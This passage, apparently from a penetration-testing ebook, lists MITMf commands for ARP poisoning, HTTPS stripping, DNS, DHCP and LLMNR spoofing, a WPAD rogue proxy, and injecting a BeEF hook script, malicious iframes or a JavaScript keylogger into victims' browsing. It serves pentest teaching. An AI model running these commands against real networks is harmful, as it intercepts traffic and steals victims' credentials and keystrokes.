Use cases of MITMf

The following are the various use cases of MITMf:

Keep in mind that all attacks should only be performed in a lab environment and only on networks for which you have obtained legal permission.
  • You can bypass HTTPS with MITMf:
python mitmf.py -i eth0 --spoof --arp --hsts --dns --gateway 10.10.10.1 --target 10.10.10.15
    • -i: Specifies the interface to execute MITMf against
    • --spoof: Tells MITMf to fake an identity
    • --arp: Performs redirection of traffic via ARP
    • --hsts: Loads the sslstrip plugin
    • --dns: Loads a proxy to modify DNS queries
    • --gateway: Specifies the gateway
    • --target: Specifies the target
  • You can perform an ARP poisoning attack between the gateway (10.10.10.1) and the entire subnet:
python mitmf.py -i eth0 --spoof --arp --gateway 10.10.10.1
  • You can perform ARP poisoning between the victim and the gateway (10.10.10.1):
python mitmf.py -i eth0 --spoof --arp --target 10.10.10.10-10.10.10.50 --gateway 10.10.10.1
  • You can perform DNS spoofing while performing an ARP poisoning attack on a subnet and gateway (10.10.10.1):
python mitmf.py -i eth0 --spoof --dns --arp --target 10.10.10.0/24 --gateway 10.10.10.1
  • You can perform LLMNR/NBTNS/MDNS spoofing using MITMf:
python mitmf.py -i eth0 --responder --wredir --nbtns
  • You can perform a DHCP spoofing attack:
python mitmf.py -i eth0 --spoof --dhcp

This attack is useful during the post-exploitation phase.

The IP addressing scheme and subnet information is taken from the config file.
  • An HTML iframe can be injected using MITMf:
python mitmf.py -i eth0 --inject --html-url <malicious web URL>
  • A JavaScript script can be injected:
python mitmf.py -i eth0 --inject --js-url http://beef:3000/hook.js

You can perform ARP poisoning with the WPAD protocol as a rogue proxy server using the responder module:

python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

The following is an additional list of parameters that can be incorporated:

  • Screen Capture: This allows MITMf to use HTML5 canvas to get an accurate image of the client's web browser using the --screen command. Additionally, you can capture screenshots using a time interval with the --interval seconds command.
  • Keylogger: The --jskeylogger command injects a JavaScript keylogger into the victim's web pages to capture keystrokes.

Please keep in mind that to view additional parameters for the MITMf tool, you can execute the python mitmf.py --help command.

Having completed this section, you now have the skill set required to perform various types of attacks using MITMf. In the next section, we will cover session hijacking attacks.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.17.74.227